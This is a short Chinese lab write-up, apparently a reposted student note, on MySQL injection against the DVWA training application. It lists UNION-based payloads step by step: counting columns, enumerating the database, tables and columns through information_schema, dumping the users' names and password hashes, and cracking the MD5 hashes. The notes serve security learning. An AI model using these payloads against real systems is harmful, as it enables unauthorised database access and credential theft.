MYSQL注入

Posted Ooooh学习笔记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MYSQL注入相关的知识,希望对你有一定的参考价值。

1.使用万能密码登陆DVWA

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2 输入网址 然后扫描网址是否有SQL漏洞

 

 

3.获取web信息

 

 

4.依次点击数据库,表名,字段 获取数据库信息

 

 

 

 

 

5 点击获取信息 获取数据库记录user password的信息

 



6 进行MD5解密

 

MYSQL注入


 

实验场景二:使用手工的方式获取DVWA的用户名和密码信息(可选)

本次实验网络拓扑如下:

 

 

 

请给出详细的漏洞利用过程及截图:

 

1. 先获取有几个字段,从1依次增加 发现到3时报错 所以有2个字段

1order by 3 #

 

 

 

 

获取所在的文件名

1  union select database(),99 #

 

3 接着找所在的文件下有什么文件 发现有来宾和用户两个文件

1' union select table_name,98 from information_schema.tables where table_schema='dvwa' #

 

4 查询在用户文件下有没有敏感信息 发现有user 和password

1' union select column_name,98 from information_schema.columns where table_schema='dvwa' and table_name='users'#

 

5 获取用户名和MD5加密密码

1' union select user,password from dvwa.users #

 


6 进行MD5解密


以上是关于MYSQL注入的主要内容,如果未能解决你的问题,请参考以下文章

php+mysql注入

mysql注入

Mysql特别注入篇

SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起

Mysql注入绕过WAF总结

SQL注入之mysql显错注入